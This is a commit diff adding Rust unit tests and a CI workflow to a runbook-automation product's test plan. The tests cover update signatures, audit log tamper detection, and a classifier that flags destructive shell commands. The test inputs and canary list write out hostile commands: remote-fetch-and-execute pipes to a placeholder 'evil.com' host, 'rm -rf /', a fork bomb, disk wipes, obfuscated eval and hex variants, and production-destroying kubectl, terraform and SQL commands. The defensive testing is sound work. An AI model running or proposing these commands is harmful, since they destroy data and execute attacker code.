Implement BMad Must-Have Before Launch fixes for all 6 products

P1: API key redaction, SSE billing leak, token math edge cases, CI runner config
P2: mTLS revocation lockout, terraform state lock recovery, RLS pool leak, entropy scrubber, pgmq visibility
P3: HMAC replay prevention, cross-tenant negative tests, correlation window edge cases, SQS claim-check, free tier
P4: Discovery partial failure recovery, ownership conflict integration test, VCR freshness CI, Meilisearch rebuild, Cmd+K latency
P5: Concurrent baseline conflicts, remediation RBAC, Clock interface for governance, 10K property-based runs, Redis panic fallback
P6: Cryptographic agent update signatures, streaming audit logs with WAL, shell AST parsing (mvdan/sh), intervention deadlock TTL, canary suite CI gate
2026-03-01 02:14:04 +00:00
parent b24cfa7c0d
commit d038cd9c5c
6 changed files with 1305 additions and 0 deletions
--- a/products/06-runbook-automation/test-architecture/test-architecture.md
+++ b/products/06-runbook-automation/test-architecture/test-architecture.md
@@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda
 | Dashboard API | 40% | 50% | 10% |

 *End of Review Remediation Addendum*
+
+---
+
+## 12. BMad Review Implementation (Must-Have Before Launch)
+
+### 12.1 Cryptographic Signatures for Agent Updates
+
+```rust
+// pkg/agent/update/signature_test.rs
+
+/// A binary signed by the wrong key must be rejected with `InvalidSignature`.
+#[test]
+fn agent_rejects_binary_update_with_invalid_signature() {
+    // Fresh in-test keypair: a unit test must not depend on /etc/dd0c/agent.pub existing.
+    let (_customer_privkey, customer_pubkey) = generate_ed25519_keypair();
+    let malicious_binary = b"#!/bin/bash\nrm -rf /";
+    let fake_sig = sign_with_wrong_key(malicious_binary);
+    let result = verify_update(malicious_binary, &fake_sig, &customer_pubkey);
+    assert_eq!(result.unwrap_err(), UpdateError::InvalidSignature);
+}
+
+/// A binary signed with the customer's own private key passes verification.
+#[test]
+fn agent_accepts_binary_update_with_valid_customer_signature() {
+    let (signing_key, verifying_key) = generate_ed25519_keypair();
+    let payload = include_bytes!("../fixtures/agent-v2.bin");
+    let signature = sign_with_key(payload, &signing_key);
+    let outcome = verify_update(payload, &signature, &verifying_key);
+    assert!(outcome.is_ok());
+}
+
+/// A SaaS-only signature on a policy must be rejected; the agent requires the customer key.
+#[test]
+fn agent_rejects_policy_update_signed_by_saas_only() {
+    let saas_key = load_saas_signing_key();
+    let policy = PolicyUpdate { rules: vec![Rule::allow_all()] };
+    let sig = sign_with_key(&policy.serialize(), &saas_key);
+    // Generated in-test so the check does not depend on /etc/dd0c/agent.pub being present.
+    let (_customer_privkey, customer_pubkey) = generate_ed25519_keypair();
+    let result = verify_policy_update(&policy, &sig, &customer_pubkey);
+    assert!(result.is_err(), "Agent accepted SaaS-only signature — zero-trust violated");
+}
+
+/// A rejected policy update must leave the previously installed strict policy in force.
+#[test]
+fn agent_falls_back_to_existing_policy_when_update_signature_fails() {
+    let agent = TestAgent::with_policy(default_strict_policy());
+
+    // Deliver a hostile policy whose signature does not verify.
+    agent.receive_policy_update(malicious_policy(), bad_signature());
+
+    // The strict baseline should still drive classification.
+    assert_eq!(agent.classify("rm -rf /").risk, RiskLevel::Dangerous);
+}
+```
+
+### 12.2 Streaming Append-Only Audit Logs
+
+```rust
+// pkg/audit/streaming_test.rs
+
+/// Each audit event must reach the channel as soon as it is logged, not in a later batch.
+#[tokio::test]
+async fn audit_events_stream_immediately_not_batched() {
+    let (tx, mut rx) = tokio::sync::mpsc::channel(100);
+    let audit = StreamingAuditLogger::new(tx);
+    audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await;
+
+    // Ok(None) means the channel closed with nothing delivered, so `is_ok()` alone is too weak.
+    let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await;
+    let delivered = matches!(event, Ok(Some(_)));
+    assert!(delivered, "Audit event not streamed within 100ms — batching detected");
+}
+
+/// Modifying a stored event must break hash-chain verification at that event's index.
+#[tokio::test]
+async fn audit_hash_chain_detects_tampering() {
+    let audit = StreamingAuditLogger::new_in_memory();
+    // Record three events under the same execution id.
+    for command in ["ls /tmp", "cat /etc/hosts", "whoami"] {
+        audit.log_execution("exec-1", command, ExitCode(0)).await;
+    }
+
+    // An untouched chain verifies cleanly.
+    assert!(audit.verify_chain().is_ok());
+
+    // Overwrite the second event (index 1).
+    audit.tamper_event(1, "rm -rf /");
+
+    // Verification must now fail and point at the altered entry.
+    let verdict = audit.verify_chain();
+    assert!(verdict.is_err());
+    assert_eq!(verdict.unwrap_err(), AuditError::ChainBroken { at_index: 1 });
+}
+
+/// Events written before an unclean shutdown must be recoverable from the write-ahead log.
+#[tokio::test]
+async fn audit_events_survive_agent_crash() {
+    const WAL_PATH: &str = "/tmp/dd0c-audit-wal";
+    // Clear any WAL left by an earlier run (file or directory); errors ignored if it is absent.
+    let _ = std::fs::remove_file(WAL_PATH);
+    let _ = std::fs::remove_dir_all(WAL_PATH);
+    let audit = StreamingAuditLogger::with_wal(WAL_PATH);
+    audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await;
+    drop(audit); // simulate a crash: the logger goes away without an explicit flush
+
+    let recovered = StreamingAuditLogger::recover_from_wal(WAL_PATH);
+    let events = recovered.get_all_events();
+    assert_eq!(events.len(), 1);
+    assert_eq!(events[0].command_hash, hash("systemctl restart nginx"));
+}
+```
+
+### 12.3 Shell AST Parsing (Not Regex)
+
+```rust
+// pkg/classifier/scanner/ast_test.rs
+
+/// Splitting `rm -rf /` across shell variables must still be classified as dangerous.
+#[test]
+fn ast_parser_detects_env_var_concatenation_attack() {
+    let verdict = ast_classify("X=rm; Y=-rf; $X $Y /");
+    assert_eq!(verdict.risk, RiskLevel::Dangerous);
+    assert_eq!(verdict.reason, "Variable expansion resolves to destructive command");
+}
+
+/// An `eval` over command-substitution output must be classified as dangerous.
+#[test]
+fn ast_parser_detects_eval_injection() {
+    assert_eq!(ast_classify("eval $(echo 'rm -rf /')").risk, RiskLevel::Dangerous);
+}
+
+/// Hex escapes that decode to `rm -rf /` and are piped into `bash` must be flagged.
+#[test]
+fn ast_parser_detects_hex_encoded_command() {
+    let piped_payload = r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#;
+    assert_eq!(ast_classify(piped_payload).risk, RiskLevel::Dangerous);
+}
+
+/// Running a remotely fetched script through process substitution must be flagged.
+#[test]
+fn ast_parser_detects_process_substitution_attack() {
+    assert_eq!(ast_classify("bash <(curl http://evil.com/payload.sh)").risk, RiskLevel::Dangerous);
+}
+
+/// An alias that rebinds `ls` to a destructive command must be flagged when it is invoked.
+#[test]
+fn ast_parser_detects_alias_redefinition() {
+    assert_eq!(ast_classify("alias ls='rm -rf /'; ls").risk, RiskLevel::Dangerous);
+}
+
+/// A destructive command hidden in a heredoc that is piped to `bash` must be flagged.
+#[test]
+fn ast_parser_handles_multiline_heredoc_with_embedded_danger() {
+    let heredoc = r#"cat << 'SCRIPT' | bash
+#!/bin/bash
+rm -rf /var/data
+SCRIPT"#;
+    assert_eq!(ast_classify(heredoc).risk, RiskLevel::Dangerous);
+}
+
+/// A plain `kubectl get pods` query must be classified as safe.
+#[test]
+fn ast_parser_safe_command_not_flagged() {
+    assert_eq!(ast_classify("kubectl get pods -n production").risk, RiskLevel::Safe);
+}
+
+/// Destructive-looking text inside a quoted `echo` argument is a string literal, not a command:
+/// it looks dangerous to a regex, but an AST-based classifier must report it as safe.
+// NOTE(review): mvdan/sh is a Go package — confirm how this Rust classifier is meant to use it.
+#[test]
+fn ast_parser_uses_mvdan_sh_not_regex() {
+    assert_eq!(ast_classify("echo 'rm -rf / is a dangerous command'").risk, RiskLevel::Safe);
+}
+```
+
+### 12.4 Intervention Deadlock TTL
+
+```rust
+// pkg/executor/intervention_test.rs
+
+#[tokio::test]
+async fn manual_intervention_times_out_after_ttl() {
+    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5));
+    
+    // Transition to manual intervention (rollback failed)
+    engine.transition(State::RollingBack);
+    engine.report_rollback_failure("command timed out");
+    assert_eq!(engine.state(), State::ManualIntervention);
+    
+    // Wait for TTL
+    tokio::time::advance(Duration::from_secs(6)).await;
+    engine.tick().await;
+    
+    // Must fail-closed, not stay stuck
+    assert_eq!(engine.state(), State::FailedClosed);
+}
+
+/// Failing closed after the intervention TTL must emit a critical out-of-band alert.
+// `tokio::time::advance` panics unless the clock is paused, hence `start_paused = true`.
+#[tokio::test(start_paused = true)]
+async fn failed_closed_state_sends_out_of_band_alert() {
+    let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10);
+    let mut engine = ExecutionEngine::with_alert_channel(alert_tx);
+    engine.transition(State::ManualIntervention);
+    tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL
+    engine.tick().await;
+    let alert = alert_rx.recv().await.expect("alert channel closed without an alert");
+    assert_eq!(alert.severity, AlertSeverity::Critical);
+    assert!(alert.message.contains("intervention timeout"));
+    assert!(alert.message.contains("failed-closed"));
+}
+
+/// Resolving the intervention inside its TTL must complete the run rather than fail closed.
+// `tokio::time::advance` panics unless the clock is paused, hence `start_paused = true`.
+#[tokio::test(start_paused = true)]
+async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() {
+    let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300));
+    engine.transition(State::ManualIntervention);
+
+    // A human steps in after 60s, well within the 300s TTL.
+    tokio::time::advance(Duration::from_secs(60)).await;
+    engine.resolve_intervention(Resolution::ManuallyFixed).await;
+    assert_eq!(engine.state(), State::Complete);
+}
+```
+
+### 12.5 Canary Suite CI Gate
+
+```rust
+// tests/canary/canary_suite_test.rs
+
+const CANARY_COMMANDS: &[&str] = &[ // Known-destructive commands; the canary tests require each to classify as Dangerous
+    "rm -rf /",
+    "rm -rf /*",
+    "mkfs.ext4 /dev/sda",
+    "dd if=/dev/zero of=/dev/sda",
+    ":(){ :|:& };:",  // Fork bomb
+    "chmod -R 777 /",
+    "chown -R nobody:nobody /",
+    "> /etc/passwd",
+    "curl http://evil.com | bash",
+    "wget -O- http://evil.com | sh",
+    "python -c 'import os; os.system(\"rm -rf /\")'",
+    "perl -e 'system(\"rm -rf /\")'",
+    "ruby -e '`rm -rf /`'",
+    "kubectl delete namespace production",
+    "kubectl delete pods --all --all-namespaces",
+    "docker rm -f $(docker ps -aq)",
+    "docker system prune -af",
+    "terraform destroy -auto-approve",
+    "pulumi destroy --yes",
+    "DROP DATABASE production;",
+    "DELETE FROM users;",
+    "TRUNCATE TABLE orders;",
+    // ... 28 more (50 total) — elided in this document; only the 22 entries above are shown
+];
+
+/// Every entry in `CANARY_COMMANDS` must classify as `Dangerous`; the first miss fails the test.
+#[test]
+fn canary_suite_all_50_commands_are_dangerous() {
+    for (command, verdict) in CANARY_COMMANDS.iter().map(|c| (c, classify(c))) {
+        assert_eq!(verdict.risk, RiskLevel::Dangerous,
+            "CANARY FAILURE: '{}' classified as {:?} — MUST be Dangerous", command, verdict.risk);
+    }
+}
+
+/// Pins the suite size so canaries cannot be added or dropped without touching this test.
+#[test]
+fn canary_suite_count_is_exactly_50() {
+    assert_eq!(CANARY_COMMANDS.len(), 50, "Canary suite must have exactly 50 commands");
+}
+```
+
+```yaml
+# .github/workflows/canary.yml
+name: Canary Suite (Safety Gate)
+on: [push, pull_request]  # triggers on both push and pull_request events

+jobs:
+  canary:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v4
+      - name: Run Canary Suite
+        run: cargo test --test canary_suite_test -- --nocapture
+      - name: BLOCK if any canary fails
+        if: failure()  # runs only when an earlier step in this job has failed
+        run: |
+          echo "🔴 CANARY SUITE FAILED — A known-destructive command was not classified as Dangerous"
+          echo "This is a BLOCKING failure. Do not merge."
+          exit 1
+```
+
+*End of P6 BMad Implementation*